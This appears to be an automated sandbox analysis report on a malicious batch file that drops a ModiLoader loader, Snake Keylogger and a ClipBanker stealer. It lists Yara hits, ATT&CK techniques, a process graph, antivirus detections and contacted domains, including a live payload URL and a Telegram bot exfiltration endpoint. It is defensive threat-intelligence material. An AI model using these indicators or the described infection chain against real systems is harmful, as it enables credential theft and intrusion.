                            Source: Yara matchFile source: 00000007.00000002.2137347669.0000000026A85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2145721948.0000000028640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.2351518623.000000001FFD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.2391691150.0000000030C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000003.2168298227.000000001BAB2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.2390995054.0000000030640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.2351220430.000000001EB95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.2066777727.0000000023BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000003.2278096725.000000002C1F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 6004, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting
                            1
                            Valid Accounts
                            12
                            Native API
                            1
                            Scripting
                            1
                            DLL Side-Loading
                            11
                            Disable or Modify Tools
                            1
                            OS Credential Dumping
                            1
                            System Time Discovery
                            Remote Services11
                            Archive Collected Data
                            1
                            Ingress Tool Transfer
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Shared Modules
                            1
                            DLL Side-Loading
                            1
                            Valid Accounts
                            11
                            Deobfuscate/Decode Files or Information
                            1
                            Input Capture
                            1
                            System Network Connections Discovery
                            Remote Desktop Protocol1
                            Data from Local System
                            11
                            Encrypted Channel
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts2
                            Command and Scripting Interpreter
                            1
                            Valid Accounts
                            1
                            Access Token Manipulation
                            3
                            Obfuscated Files or Information
                            Security Account Manager2
                            File and Directory Discovery
                            SMB/Windows Admin Shares1
                            Screen Capture
                            2
                            Non-Application Layer Protocol
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts1
                            Scheduled Task/Job
                            1
                            Scheduled Task/Job
                            311
                            Process Injection
                            3
                            Software Packing
                            NTDS36
                            System Information Discovery
                            Distributed Component Object Model1
                            Email Collection
                            113
                            Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchd21
                            Registry Run Keys / Startup Folder
                            1
                            Scheduled Task/Job
                            1
                            Timestomp
                            LSA Secrets1
                            Query Registry
                            SSH1
                            Input Capture
                            Fallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                            Registry Run Keys / Startup Folder
                            1
                            DLL Side-Loading
                            Cached Domain Credentials341
                            Security Software Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                            Masquerading
                            DCSync41
                            Virtualization/Sandbox Evasion
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            Valid Accounts
                            Proc Filesystem2
                            Process Discovery
                            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            Access Token Manipulation
                            /etc/passwd and /etc/shadow1
                            Application Window Discovery
                            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
                            Virtualization/Sandbox Evasion
                            Network Sniffing1
                            System Network Configuration Discovery
                            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
                            Process Injection
                            Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583899 Sample: PO#5_Tower_049.bat Startdate: 03/01/2025 Architecture: WINDOWS Score: 100 87 reallyfreegeoip.org 2->87 89 lwaziacademy.com 2->89 91 4 other IPs or domains 2->91 95 Found malware configuration 2->95 97 Malicious sample detected (through community Yara rule) 2->97 99 Antivirus detection for URL or domain 2->99 103 19 other signatures 2->103 11 cmd.exe 1 2->11         started        13 Oupzhkpr.PIF 2->13         started        16 Oupzhkpr.PIF 2->16         started        signatures3 101 Tries to detect the country of the analysis system (by using the IP) 87->101 process4 signatures5 18 x.exe 1 10 11->18         started        23 extrac32.exe 8 11->23         started        25 conhost.exe 11->25         started        121 Antivirus detection for dropped file 13->121 123 Multi AV Scanner detection for dropped file 13->123 125 Writes to foreign memory regions 13->125 127 Allocates many large memory junks 13->127 27 cmd.exe 13->27         started        29 rpkhzpuO.pif 13->29         started        129 Allocates memory in foreign processes 16->129 131 Sample uses process hollowing technique 16->131 133 Sample is not signed and drops a device driver 16->133 31 cmd.exe 16->31         started        33 rpkhzpuO.pif 16->33         started        process6 dnsIp7 93 lwaziacademy.com 41.185.8.252, 443, 49704, 49705 GridhostZA South Africa 18->93 67 C:\Users\Public\Libraries\rpkhzpuO.pif, PE32 18->67 dropped 69 C:\Users\Public\Libraries\Oupzhkpr.PIF, PE32 18->69 dropped 71 C:\Users\Public\Oupzhkpr.url, MS 18->71 dropped 75 2 other malicious files 18->75 dropped 105 Antivirus detection for dropped file 18->105 107 Multi AV Scanner detection for dropped file 18->107 109 Drops PE files with a suspicious file extension 18->109 111 6 other signatures 18->111 35 rpkhzpuO.pif 6 18->35         started        39 cmd.exe 1 18->39         started        73 C:\Users\user\AppData\Local\Temp\x.exe, PE32 23->73 dropped 41 conhost.exe 27->41         started        43 conhost.exe 31->43         started        file8 signatures9 process10 file11 77 C:\Users\user\AppData\...\Trading_AIBot.exe, PE32 35->77 dropped 79 C:\Users\user\AppData\...\Microsofts.exe, PE32 35->79 dropped 113 Detected unpacking (changes PE section rights) 35->113 115 Detected unpacking (overwrites its own PE header) 35->115 45 Trading_AIBot.exe 5 35->45         started        49 Microsofts.exe 15 2 35->49         started        52 conhost.exe 39->52         started        signatures12 process13 dnsIp14 81 C:\Users\user\AppData\Roaming\...\apihost.exe, PE32 45->81 dropped 135 Antivirus detection for dropped file 45->135 137 Multi AV Scanner detection for dropped file 45->137 139 Machine Learning detection for dropped file 45->139 145 3 other signatures 45->145 54 powershell.exe 23 45->54         started        57 apihost.exe 45->57         started        59 schtasks.exe 45->59         started        83 checkip.dyndns.com 158.101.44.242, 49706, 80 ORACLE-BMC-31898US United States 49->83 85 reallyfreegeoip.org 188.114.96.3, 443, 49708 CLOUDFLARENETUS European Union 49->85 141 Tries to steal Mail credentials (via file / registry access) 49->141 143 Tries to harvest and steal browser information (history, passwords, etc) 49->143 file15 signatures16 process17 signatures18 117 Loading BitLocker PowerShell Module 54->117 61 conhost.exe 54->61         started        63 WmiPrvSE.exe 54->63         started        119 Antivirus detection for dropped file 57->119 65 conhost.exe 59->65         started        process19

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            PO#5_Tower_049.bat45%ReversingLabsWin32.Trojan.ModiLoader
                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe100%AviraTR/Dropper.Gen
                            C:\Users\Public\Libraries\Oupzhkpr.PIF100%AviraHEUR/AGEN.1326043
                            C:\Users\user\AppData\Local\Temp\x.exe100%AviraHEUR/AGEN.1326043
                            C:\Users\user\AppData\Roaming\ACCApi\apihost.exe100%AviraTR/Dropper.Gen
                            C:\Users\user\AppData\Local\Temp\Microsofts.exe100%AviraTR/ATRAPS.Gen
                            C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\Microsofts.exe100%Joe Sandbox ML
                            C:\Users\Public\Libraries\Oupzhkpr.PIF83%ReversingLabsWin32.Trojan.ModiLoader
                            C:\Users\Public\Libraries\rpkhzpuO.pif3%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\Microsofts.exe91%ReversingLabsByteCode-MSIL.Spyware.Snakekeylogger
                            C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe79%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                            C:\Users\user\AppData\Local\Temp\x.exe83%ReversingLabsWin32.Trojan.ModiLoader
                            No Antivirus matches
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            https://lwaziacademy.com:443/wps/200_OupzhkprnvwB0%Avira URL Cloudsafe
                            https://lwaziacademy.com/wps/2000%Avira URL Cloudsafe
                            https://lwaziacademy.com/wps/200_Oupzhkprnvw100%Avira URL Cloudmalware
                            http://team-x.ru/0%Avira URL Cloudsafe
                            https://lwaziacademy.com/0%Avira URL Cloudsafe
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            reallyfreegeoip.org
                            188.114.96.3
                            truefalse
                              high
                              lwaziacademy.com
                              41.185.8.252
                              truetrue
                                unknown
                                checkip.dyndns.com
                                158.101.44.242
                                truefalse
                                  high
                                  checkip.dyndns.org
                                  unknown
                                  unknownfalse
                                    high
                                    171.39.242.20.in-addr.arpa
                                    unknown
                                    unknownfalse
                                      high
                                      212.20.149.52.in-addr.arpa
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        https://reallyfreegeoip.org/xml/8.46.123.189false
                                          high
                                          https://lwaziacademy.com/wps/200_Oupzhkprnvwtrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://checkip.dyndns.org/false
                                            high
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpfalse
                                              high
                                              http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://sectigo.com/CPS0x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    http://ocsp.sectigo.com0x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://team-x.ru/x.exe, 00000004.00000003.2058015103.00000000218ED000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2016123809.000000007F370000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000000.2012623457.0000000000401000.00000020.00000001.01000000.00000004.sdmp, rpkhzpuO.pif, 00000007.00000002.2099220238.0000000000C40000.00000040.00000400.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000002.2099220238.0000000001220000.00000040.00000400.00020000.00000000.sdmp, PO#5_Tower_049.bat, Oupzhkpr.PIF.4.dr, x.exe.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://reallyfreegeoip.orgdMicrosofts.exe, 00000009.00000002.3277651726.0000000002EFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://contoso.com/Iconpowershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reallyfreegeoip.org/xml/8.46.1dMicrosofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://checkip.dyndns.orgMicrosofts.exe, 00000009.00000002.3277651726.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://lwaziacademy.com:443/wps/200_OupzhkprnvwBx.exe, 00000004.00000002.2065211434.00000000005C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://crl.mipowershell.exe, 0000000A.00000002.2166666911.0000000003397000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://lwaziacademy.com/wps/200x.exe, 00000004.00000002.2084775206.000000002070D000.00000004.00001000.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://reallyfreegeoip.org/xml/8.46.123.189lMicrosofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://checkip.dyndns.comdMicrosofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://aka.ms/pscore6lBpowershell.exe, 0000000A.00000002.2191894741.0000000004C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://reallyfreegeoip.org/Microsofts.exe, 00000009.00000002.3264032203.00000000012F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://lwaziacademy.com/x.exe, 00000004.00000002.2065211434.000000000054E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://checkip.dyndns.org/qrpkhzpuO.pif, 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://contoso.com/powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://reallyfreegeoip.orgMicrosofts.exe, 00000009.00000002.3277651726.0000000002EFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://checkip.dyndns.orgdMicrosofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://reallyfreegeoip.orgMicrosofts.exe, 00000009.00000002.3277651726.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://checkip.dyndns.comMicrosofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://checkip.dyndns.org/dMicrosofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMicrosofts.exe, 00000009.00000002.3277651726.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2191894741.0000000004C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://ocsp.sectigo.com0Cx.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://api.telegram.org/bot-/sendDocument?chat_id=rpkhzpuO.pif, 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                                              high
